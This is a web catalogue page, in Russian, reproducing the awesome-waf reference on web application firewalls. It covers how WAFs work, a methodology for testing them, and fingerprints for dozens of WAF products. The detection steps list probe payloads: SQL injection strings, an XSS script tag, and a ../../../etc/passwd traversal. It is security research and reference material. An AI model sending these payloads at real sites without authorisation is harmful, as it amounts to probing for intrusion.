Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Awesome-WAF — Всё о межсетевых экранах веб-приложений (WAF) с точки зрения безопасности! 🔥 | Kitploit
Инструменты/GitHubGitHub/0xinfection/awesome-waf
Обход WAFВеб-безопасностьОбучение и ОбразованиеПодобранные Ресурсы
GitHub0xinfection/awesome-waf

Awesome-WAF

Всё о межсетевых экранах веб-приложений (WAF) с точки зрения безопасности! 🔥

Репозиторий
7.6k1.2k4 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Крутой WAF Awesome

Всё о межсетевых экранах веб-приложений (WAF) с точки зрения безопасности. 🔥

Предисловие: Изначально это была моя личная коллекция WAF. Я делаю её открытым исходным кодом в надежде, что она будет полезна пентестерам и исследователям. Как говорится, "сообщество просто учится друг у друга."

Главный логотип

Краткое определение: Брандмауэр — это точка обеспечения политики безопасности, расположенная между веб-приложением и клиентской конечной точкой. Эта функциональность может быть реализована в программном или аппаратном обеспечении, работать на аппаратном устройстве или на обычном сервере под управлением типичной операционной системы. Это может быть отдельное устройство или встроенный компонент других сетевых элементов. (Источник: PCI DSS IS 6.6)

Брандмауэр веб-приложений (WAF) располагается между пользователем и веб-приложением и предназначен для предотвращения любой вредоносной активности, достигающей веб-приложения. WAF либо отфильтровывает вредоносную часть запроса, либо просто блокирует его.

Не стесняйтесь вносить вклад.

Содержание:

  • Введение
    • Как работают WAF
    • Режимы работы
  • Методология тестирования
    • Где искать
    • Методы обнаружения
  • Отпечатки WAF
  • Методы обхода
    • Фаззинг/Брутфорс
    • Реверсирование регулярных выражений
    • Обфускация/Кодирование
    • Ошибки браузера
    • Подмена HTTP-заголовков
    • Подход с Google Dorks
  • Известные обходы
  • Крутые инструменты
    • Снятие отпечатков
    • Тестирование
    • Обход
  • Блоги и статьи
  • Видеопрезентации
  • Исследовательские презентации и статьи
    • Исследовательские статьи
    • Слайды презентаций
  • Лицензия и благодарности

Введение:

Как работают WAF:

  • Использование набора правил для различения обычных и вредоносных запросов.
  • Иногда они используют режим обучения для автоматического добавления правил на основе изучения поведения пользователей.

Режимы работы:

  • Негативная модель (на основе чёрного списка) - Модель чёрного списка использует предварительно заданные сигнатуры для блокировки запросов, которые явно являются вредоносными. Сигнатуры WAF, работающих в негативной модели, специально созданы для предотвращения атак, эксплуатирующих определённые уязвимости веб-приложений. Брандмауэры веб-приложений, работающие по модели чёрного списка, являются отличным выбором для веб-приложений, доступных из публичного интернета, и весьма эффективны против основных уязвимостей. Например, правило, блокирующее все входные данные <script>*</script>, предотвращает базовые атаки межсайтового скриптинга.
  • Позитивная модель (на основе белого списка) - Модель белого списка разрешает только веб-трафик в соответствии с определёнными критериями. Например, она может быть настроена на разрешение только HTTP GET-запросов с определённых IP-адресов. Эта модель может быть очень эффективной для блокировки потенциальных крупномасштабных атак, но также будет блокировать много легитимного трафика. Брандмауэры с моделью белого списка, вероятно, лучше всего подходят для веб-приложений во внутренней сети, которые предназначены для использования только ограниченной группой людей, например, сотрудниками.
  • Смешанная/Гибридная модель (Инклюзивная модель) - Гибридная модель безопасности сочетает как белый, так и чёрный списки. В зависимости от различных конфигурационных особенностей, гибридные брандмауэры могут быть лучшим выбором как для веб-приложений во внутренних сетях, так и для веб-приложений в публичном интернете. Хорошим сценарием может быть, когда веб-приложение обращено к публичному интернету (использует чёрные списки), а панель администратора должна быть доступна только подмножеству пользователей (использует белые списки).

Методология тестирования:

Где искать:

  • Всегда обращайте внимание на распространённые порты, которые раскрывают наличие WAF, а именно порты 80, 443, 8000, 8080 и 8888. Однако важно отметить, что WAF может быть легко развёрнут на любом порту, на котором работает HTTP-сервис. Полезно сначала перечислить порты HTTP-сервисов, а затем искать WAF.
  • Некоторые WAF устанавливают свои собственные cookies в запросах (например, Citrix Netscaler, Yunsuo WAF).
  • Некоторые ассоциируют себя с отдельными заголовками (например, Anquanbao WAF, Amazon AWS WAF).
  • Некоторые часто изменяют заголовки и перемешивают символы, чтобы запутать атакующего (например, Netscaler, Big-IP).
  • Некоторые раскрывают себя в заголовке Server (например, Approach, WTS WAF).
  • Некоторые WAF раскрывают себя в содержимом ответа (например, DotDefender, Armor, Sitelock).
  • Другие WAF отвечают необычными кодами ответа на вредоносные запросы (например, WebKnight, 360 WAF).

Методы обнаружения:

Чтобы идентифицировать WAF, нам нужно (фиктивно) спровоцировать его.

  1. Выполните обычный GET-запрос из браузера, перехватите и запишите заголовки ответа (в частности, cookies).
  2. Выполните запрос из командной строки (например, cURL), и проверьте содержимое ответа и заголовки (без указания user-agent).
  3. Выполните GET-запросы к случайным открытым портам и получите баннеры, которые могут раскрыть личность WAF.
  4. На страницах входа внедрите распространённые (легко обнаруживаемые) полезные нагрузки, такие как " or 1 = 1 --.
  5. Внедрите шумные полезные нагрузки, такие как <script>alert()</script>, в строки поиска, контактные формы и другие поля ввода.
  6. Добавьте фиктивный ../../../etc/passwd к случайному параметру в конце URL.
  7. Добавьте некоторые привлекающие ключевые слова, такие как ' OR SLEEP(5) OR ', в конец URL к любому случайному параметру.
  8. Выполните GET-запросы с устаревшими протоколами, такими как HTTP/0.9 (HTTP/0.9 не поддерживает запросы типа POST).
  9. Часто WAF изменяет заголовок Server при различных типах взаимодействия.
  10. Техника сброса действия — Отправьте сырой сформированный FIN/RST пакет на сервер и определите ответ.

    Совет: Этот метод может быть легко выполнен с помощью таких инструментов, как HPing3 или Scapy.

  11. Атаки по побочным каналам — Исследуйте временное поведение запроса и содержимое ответа.

    Совет: Более подробную информацию можно найти в .

Отпечатки WAF

Хотите снять отпечатки WAF? Давайте посмотрим как.

ПРИМЕЧАНИЕ: Этот раздел содержит ручные методы обнаружения WAF. Возможно, вы захотите перейти к следующему разделу.





## Техники обхода Давайте рассмотрим некоторые методы обхода и уклонения от WAF.
Скачать инструмент
блог-посте здесь
WAFОтпечатки
360
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Возвращает код состояния 493 при необычных запросах.
    • Страница блокировки может содержать ссылку на каталог wzws-waf-cgi/.
    • Исходный код страницы блокировки может содержать:
      • Ссылку на URL wangshan.360.cn.
      • Фрагмент текста Sorry! Your access has been intercepted because your links may threaten website security.
    • Заголовки ответа могут содержать заголовок X-Powered-By-360WZB.
    • Заголовки заблокированного ответа содержат уникальный заголовок WZWS-Ray.
    • Заголовок Server может содержать значение qianxin-waf.
aeSecure
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Содержимое заблокированного ответа содержит изображение aesecure_denied.png (смотрите исходный код).
    • Заголовки ответа содержат значение aeSecure-code.
Airlock
  • Обнаруживаемость: Средняя/Сложная
  • Методика обнаружения:
    • Заголовки Set-Cookie могут содержать:
      • Имя поля cookie AL-SESS (без учета регистра).
      • Значение AL-LB (без учета регистра).
    • Страница заблокированного ответа содержит:
      • Текст Server detected a syntax error in your request.
      • Фрагмент текста Check your request and all parameters.
AlertLogic
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа содержит:
      • Фрагмент текста We are sorry, but the page you are looking for cannot be found.
      • Текст The page has either been removed, renamed or temporarily unavailable.
      • 404 Not Found красными буквами.
Aliyundun
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит:
      • Фрагмент текста Sorry, your request has been blocked as it may cause potential threats to the server's security.
      • Ссылку на URL сайта errors.aliyun.com.
    • Возвращаемый код заблокированного ответа — 405.
Anquanbao
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Возвращает код HTTP-ответа 405 при вредоносных запросах.
    • Содержимое заблокированного ответа может содержать /aqb_cc/error/ или hidden_intercept_time.
    • Заголовки ответа содержат поле заголовка X-Powered-by-Anquanbao.
Anyu
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое заблокированного ответа содержит Sorry! your access has been intercepted by AnYu
    • Страница заблокированного ответа содержит текст AnYu- the green channel.
    • Заголовки ответа могут содержать необычный заголовок WZWS-RAY.
Approach
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое страницы заблокированного ответа может содержать:
      • Заголовок Approach Web Application Firewall Framework.
      • Предупреждение Your IP address has been logged and this information could be used by authorities to track you.
      • Ключевое слово Sorry for the inconvenience!.
      • Фрагмент текста Approach infrastructure team.
    • Заголовок Server имеет значение поля Approach.
Armor Defense
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое заблокированного ответа содержит:
      • Текст This request has been blocked by website protection from Armor.
      • Фрагмент If you manage this domain please create an Armor support ticket.
ArvanCloud
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово ArvanCloud.
ASPA
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово ASPA-WAF.
    • Ответ содержит уникальный заголовок ASPA-Cache-Status с содержимым HIT или MISS.
ASP.NET Generic
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки ответа могут содержать значение заголовка X-ASPNET-Version.
    • Содержимое страницы заблокированного ответа может содержать:
      • This generic 403 error means that the authenticated user is not authorized to use the requested resource.
      • Ключевое слово Error Code 0x00000000<.
    • Заголовок X-Powered-By имеет значение поля ASP.NET.
Astra
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое страницы заблокированного ответа может содержать:
      • Sorry, this is not allowed. в h1.
      • Фрагмент текста our website protection system has detected an issue with your IP address and wont let you proceed any further.
      • Ссылку на URL www.getastra.com/assets/images/.
    • Файлы cookie ответа содержат значение поля cz_astra_csrf_cookie в заголовках ответа.
AWS ELB
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки ответа могут содержать:
      • Значение поля cookie AWSALB.
      • Заголовок X-AMZ-ID.
      • Заголовок X-AMZ-REQUEST-ID.
    • Страница ответа может содержать:
      • Ключевое слово Access Denied.
      • Идентификатор токена запроса длиной от 20 до 25 между тегом RequestId.
    • Поле заголовка Server содержит значение awselb/2.0.
Baidu Yunjiasu
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовок Server может содержать значение Yunjiasu-nginx.
    • Заголовок Server может содержать значение Yunjiasu.
Barikode
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое страницы заблокированного ответа содержит:
      • Ключевое слово BARIKODE.
      • Фрагмент текста Forbidden Access в h1.
Barracuda
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Файлы cookie ответа могут содержать значение barra_counter_session.
    • Заголовки ответа могут содержать ключевое слово barracuda_.
  • Страница ответа содержит:
    • Заголовок You have been blocked.
    • Текст You are unable to access this website.
Bekchy
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки заблокированного ответа содержат Bekchy - Access Denied.
    • Страница заблокированного ответа содержит ссылку на https://bekchy.com/report.
BinarySec
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки ответа содержат:
      • Поле X-BinarySec-Via.
      • Поле X-BinarySec-NoCache.
      • Заголовок Server содержит ключевое слово BinarySec.
BitNinja
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа может содержать:
      • Фрагмент текста Security check by BitNinja.
      • your IP will be removed from BitNinja.
      • Фрагмент текста Visitor anti-robot validation.
      • Текст (You will be challenged by a reCAPTCHA page).
BIG-IP ASM
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки ответа могут содержать ключевое слово BigIP или F5.
    • Поля заголовка ответа могут содержать заголовок X-WA-Info.
    • Заголовки ответа могут иметь искажённое значение поля X-Cnection.
BlockDos
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовок Server содержит значение BlockDos.net.
Bluedon IST
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит значение поля BDWAF.
    • Страница заблокированного ответа содержит фрагмент текста Bluedon Web Application Firewall.
BulletProof Security Pro
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Страница заблокированного ответа содержит:
      • div с id bpsMessage фрагмент текста.
      • Фрагмент текста If you arrived here due to a search or clicking on a link click your Browser's back button to return to the previous page.
CDN NS Application Gateway
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит фрагмент текста CdnNsWAF Application Gateway.
Cerber (WordPress)
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа содержит:
      • Фрагмент текста We're sorry, you are not allowed to proceed.
      • Предупреждение Your request looks suspicious or similar to automated requests from spam posting software.
Chaitin Safeline
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ключевое слово event_id внутри HTML-комментариев.
ChinaCache
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат поле Powered-by-ChinaCache.
Cisco ACE XML Gateway
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовок Server имеет значение ACE XML Gateway.
Cloudbric
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Содержимое ответа содержит:
      • Заголовок Malicious Code Detected.
      • Фрагмент текста Your request was blocked by Cloudbric.
      • Ссылку на URL https://cloudbric.zendesk.com.
      • Текст Cloudbric Help Center.
      • Заголовок страницы, начинающийся с Cloudbric | ERROR!.
Cloudflare
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа могут содержать значение поля cf-ray.
    • Поле заголовка Server имеет значение cloudflare.
    • Заголовки ответа Set-Cookie имеют поле cookie __cfuid=.
    • Содержимое страницы может содержать Attention Required! или Cloudflare Ray ID:.
    • Содержимое страницы может содержать текст DDoS protection by Cloudflare.
    • При переходе по недействительным URL может появиться CLOUDFLARE_ERROR_500S_BOX.
CloudfloorDNS
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Поле заголовка Server имеет значение CloudfloorDNS WAF.
    • Заголовок страницы блокировки может содержать CloudfloorDNS - Web Application Firewall Error.
    • Содержимое страницы может содержать URL www.cloudfloordns.com/contact в качестве контактной ссылки.
Cloudfront
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое заблокированного ответа содержит ошибку Generated by cloudfront (CloudFront) при вредоносном запросе.
Comodo cWatch
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит значение Protected by COMODO WAF.
CrawlProtect
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Файлы cookie ответа могут содержать имя cookie crawlprotect.
    • Заголовок страницы блокировки содержит ключевое слово CrawlProtect.
    • Содержимое заблокированного ответа содержит значение
      This site is protected by CrawlProtect !!! при вредоносном запросе.
Deny-All
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Содержимое ответа содержит значение Condition Intercepted.
    • Заголовок Set-Cookie содержит поле cookie sessioncookie.
Distil Web Protection
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат значение поля X-Distil-CS во всех запросах.
    • Страница заблокированного ответа содержит:
      • Заголовок Pardon Our Interruption....
      • Фрагмент текста You have disabled javascript in your browser..
      • Текст Something about your browser made us think that you are a bot..
DoSArrest Internet Security
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат значение поля X-DIS-Request-ID.
    • Заголовок Server содержит ключевое слово DOSarrest.
DotDefender
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое заблокированного ответа содержит значение
      dotDefender Blocked Your Request.
    • Заголовки заблокированного ответа содержат значение поля X-dotDefender-denied.
DynamicWeb Injection Check
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки заблокированного ответа содержат поле X-403-Status-By со значением dw-inj-check.
e3Learning Security
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово e3Learning_WAF.
EdgeCast (Verizon)
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое заблокированного ответа содержит значение
      Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon).
    • При вредоносных запросах возвращается код 400 Bad Request.
Eisoo Cloud
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое страницы заблокированного ответа может содержать:
      • Ссылку /eisoo-firewall-block.css.
      • URL www.eisoo.com.
      • Ключевое слово © (year) Eisoo Inc..
    • Заголовок Server имеет значение поля EisooWAF-AZURE/EisooWAF.
Expression Engine
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа обычно возвращает Invalid URI.
    • Содержимое заблокированного ответа содержит значение Invalid GET Request при вредоносных GET-запросах.
    • Заблокированные POST-запросы содержат Invalid Data в содержимом ответа.
F5 ASM
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Содержимое заблокированного ответа содержит предупреждение
      The requested URL was rejected. Please consult with your administrator.
FortiWeb
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки ответа содержат FORTIWAFSID= при вредоносных запросах.
    • Страница заблокированного ответа содержит:
      • Ссылку на иконку изображения .fgd_icon.
      • Заголовок Server Unavailable!.
      • Текст Server unavailable. Please visit later..
GoDaddy
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит значение
      Access Denied - GoDaddy Website Firewall.
GreyWizard
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит:
      • Grey Wizard в качестве заголовка.
      • Фрагмент текста Contact the website owner or Grey Wizard.
      • Фрагмент текста We've detected attempted attack or non standard traffic from your IP address.
    • Заголовок Server содержит ключевое слово greywizard.
Huawei Cloud
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит:
      • Ссылку на изображение ошибки account.hwclouds.com/static/error/images/404img.jpg.
      • Ссылку на URL www.hwclouds.com.
      • Ссылку на email hws_security@{site.tld} для сообщений.
HyperGuard
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Заголовок Set-Cookie содержит поле cookie ODSESSION= в заголовках ответа.
IBM DataPower
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Заголовки ответа содержат значение поля X-Backside-Transport со значением OK или FAIL.
Imperva Incapsula
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое страницы заблокированного ответа может содержать:
      • Фрагмент текста Powered By Incapsula.
      • Ключевое слово Incapsula incident ID.
      • Ключевое слово _Incapsula_Resource.
      • Ключевое слово subject=WAF Block Page.
    • Заголовки обычного GET-запроса содержат значение visid_incap.
    • Заголовки ответа могут содержать имя поля заголовка X-Iinfo.
    • Заголовок Set-Cookie содержит поля cookie incap_ses и visid_incap.
Imunify360
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово imunify360-webshield.
    • Страница ответа содержит:
      • Фрагмент текста Powered by Imunify360.
      • imunify360 preloader, если тип ответа — JSON.
    • Страница заблокированного ответа содержит текст protected by Imunify360.
IndusGuard
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовок Server содержит значение IF_WAF.
    • Содержимое заблокированного ответа содержит предупреждение
      further investigation and remediation with a screenshot of this page.
    • Заголовки ответа содержат уникальный заголовок X-Version.
Instart DX
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат уникальный заголовок X-Instart-Request-ID.
    • Заголовки ответа содержат уникальный отпечаток заголовка X-Instart-WL.
    • Заголовки ответа содержат уникальный отпечаток заголовка X-Instart-Cache.
    • Страница заблокированного ответа содержит текст The requested URL was rejected. Please consult with your administrator..
ISA Server
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница ответа содержит:
      • Фрагмент текста The ISA Server denied the specified Uniform Resource Locator (URL).
      • Фрагмент текста The server denied the specified Uniform Resource Locator (URL). Contact the server administrator.
Janusec Application Gateway
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит изображение с названием и логотипом JANUSEC.
    • Страница заблокированного ответа отображает Janusec Application Gateway при вредоносных запросах.
Jiasule
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ссылку на URL static.jiasule.com/static/js/http_error.js.
    • Заголовок Set-Cookie содержит поля cookie _jsluid= или jsl_tracking в заголовках ответа.
    • Заголовок Server содержит ключевые слова jiasule-WAF.
    • Содержимое заблокированного ответа содержит ключевое слово notice-jiasule.
KeyCDN
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово KeyCDN.
KnownSec
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа отображает изображение ks-waf-error.png (смотрите исходный код).
KONA Site Defender (Akamai)
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово AkamaiGHost.
LiteSpeed
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server имеет значение LiteSpeed.
    • Страница ответа содержит:
      • Текст Proudly powered by LiteSpeed Web Server.
      • Ссылку на http://www.litespeedtech.com/error-page
      • Access to resource on this server is denied.
Malcare
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Страница заблокированного ответа может содержать:
      • Фрагмент текста Blocked because of Malicious Activities.
      • Фрагмент текста Firewall powered by MalCare.
MissionControl Application Shield
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Поле заголовка Server содержит значение Mission Control Application Shield.
ModSecurity
  • Обнаруживаемость: Средняя/Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа содержит:
      • Фрагмент текста This error was generated by Mod_Security.
      • Фрагмент текста One or more things in your request were suspicious.
      • Фрагмент текста rules of the mod_security module.
      • Фрагмент текста mod_security rules triggered.
      • Ссылку на каталог /modsecurity-errorpage/.
    • Заголовок Server может содержать ключевые слова Mod_Security или NYOB.
    • Иногда код ответа на атаку — 403, а фраза ответа — ModSecurity Action.
ModSecurity CRS
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница блокировки появляется при добавлении отдельного заголовка запроса X-Scanner с определённым уровнем паранойи.
NAXSI
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит This Request Has Been Blocked By NAXSI.
    • Заголовки ответа содержат необычное поле X-Data-Origin со значением ключевого слова naxsi/waf.
    • Заголовок Server содержит значение ключевого слова naxsi/waf.
    • Страница заблокированного ответа может содержать код ошибки NAXSI blocked information.
Nemesida
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа содержит Suspicious activity detected. Access to the site is blocked..
    • Содержит ссылку на email nwaf@{site.tld}
Netcontinuum
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Сессионные cookie содержат имя поля cookie NCI__SessionId=.
NetScaler AppFirewall
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки ответа могут содержать
      • Имя поля заголовка Connection: искажено до nnCoection:
      • Имя поля cookie ns_af=.
      • Имя поля citrix_ns_id.
      • Ключевое слово NSC.
      • Значение поля NS-CACHE.
NevisProxy
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Файлы cookie заголовка ответа содержат ключевое слово Navajo.
NewDefend
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница ответа содержит:
      • Ссылку на URL http://www.newdefend.com/feedback/misinformation/.
      • Ссылку на каталог /nd_block/.
    • Заголовок Server содержит ключевое слово NewDefend.
Nexusguard
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ссылку на URL speresources.nexusguard.com/wafpage/index.html.
NinjaFirewall
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовок страницы ответа содержит NinjaFirewall: 403 Forbidden.
    • Страница ответа содержит:
      • Фрагмент текста For security reasons, it was blocked and logged.
      • Ключевое слово NinjaFirewall в заголовке.
    • Возвращает ответ 403 Forbidden при вредоносных запросах.
NSFocus
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово NSFocus.
NullDDoS
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово NullDDoS System.
onMessage Shield
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат поле заголовка X-Engine со значением onMessage Shield.
    • Страница заблокированного ответа содержит:
      • Ключевое слово Blackbaud K-12 conducts routine maintenance.
      • This site is protected by an enhanced security system.
      • Ссылку на URL https://status.blackbaud.com.
      • Ссылку на URL https://maintenance.blackbaud.com.
OpenResty Lua WAF
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово openresty/{version}.
    • Страница заблокированного ответа содержит текст openresty/{version}.
    • Возвращается код заблокированного ответа 406 Not Acceptable.
Palo Alto
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Страница заблокированного ответа содержит Virus/Spyware Download Blocked.
    • Страница ответа может содержать фрагмент текста Palo Alto Next Generation Security Platform.
PentaWAF
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово PentaWAF/{version}.
    • Страница заблокированного ответа содержит текст PentaWAF/{version}.
PerimeterX
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ссылку на
      URL https://www.perimeterx.com/whywasiblocked.
pkSecurityModule IDS
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Содержимое ответа может содержать
      • pkSecurityModule: Security.Alert.
      • Фрагмент текста A safety critical request was discovered and blocked.
Positive Technologies Application Firewall
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа содержит Forbidden в h1 с последующим:
    • Request ID: в формате yyyy-mm-dd-hh-mm-ss-{ref. code}
PowerCDN
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки ответа могут содержать
      • Заголовок Via с содержимым powercdn.com.
      • Заголовок X-Cache с содержимым powercdn.com.
      • Заголовок X-CDN с содержимым PowerCDN.
Profense
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки Set-Cookie содержат имя поля cookie PLBSID=.
    • Заголовок Server содержит ключевое слово Profense.
Proventia (IBM)
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа может содержать фрагмент текста request does not match Proventia rules.
Puhui
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово PuhuiWAF.
Qiniu CDN
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое ответа может содержать
      • Заголовки ответа содержат необычный заголовок X-Qiniu-CDN со значением 0 или 1.
Radware Appwall
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Страница ответа содержит следующий фрагмент текста:
      Unauthorized Activity Has Been Detected. и Case Number
    • Страница заблокированного ответа содержит ссылку на email radwarealerting@{site.tld}.
    • Страница заблокированного ответа имеет заголовок Unauthorized Request Blocked.
    • Заголовки ответа могут содержать имя поля заголовка X-SL-CompState.
Reblaze
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Файлы cookie в заголовках ответа содержат имя поля заголовка rbzid=.
    • Значение поля Server может содержать фрагмент текста Reblaze Secure Web Gateway.
    • Страница ответа содержит:
      • Access Denied (403) жирным шрифтом.
      • Текст Current session has been terminated.
      • For further information, do not hesitate to contact us.
Request Validation Mode
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Брандмауэр, встречающийся исключительно на веб-сайтах ASP.NET и ни на каких других.
    • Страница ответа содержит один из следующих фрагментов текста:
      • ASP.NET has detected data in the request that is potentially dangerous.
      • Request Validation has detected a potentially dangerous client input value.
      • HttpRequestValidationException.
    • Возвращаемый код заблокированного ответа всегда 500 Internal Error.
RSFirewall
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница ответа содержит:
      • Ключевое слово COM_RSFIREWALL_403_FORBIDDEN.
      • Ключевое слово COM_RSFIREWALL_EVENT.
Sabre
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Возвращает код состояния 500 Internal Error при вредоносных запросах.
    • Содержимое ответа содержит:
      • Контактный email [email protected].
      • Жирное предупреждение Your request has been blocked.
      • Фрагмент текста clicking the above email link will automatically add some important details to the email for us to investigate the problem.
Safe3
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат:
      • Заголовок X-Powered-By имеет значение поля Safe3WAF.
      • Заголовок Server содержит значение поля Safe3 Web Firewall.
    • Страница ответа содержит ключевое слово Safe3waf.
SafeDog
  • Обнаруживаемость: Легко/Средняя
  • Методика обнаружения:
    • Заголовок Server в ответе может содержать:
      • Ключевое слово WAF/2.0.
      • Значение поля safedog.
SecKing
  • Обнаруживаемость: Легко/Средняя
  • Методика обнаружения:
    • Заголовок Server в ответе может содержать:
      • Ключевое слово SECKINGWAF.
      • Значение поля SECKING/{version}.
SecuPress
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое ответа может содержать:
      • SecuPress в виде текста.
      • Block ID: Bad URL Contents в виде текста.
    • Возвращается код ответа 503 Service Unavailable.
Secure Entry
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит значение Secure Entry Server.
SecureIIS
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница ответа содержит один из следующих фрагментов текста:
      • Изображение с логотипом beyondtrust.
      • Download SecureIIS Personal Edition
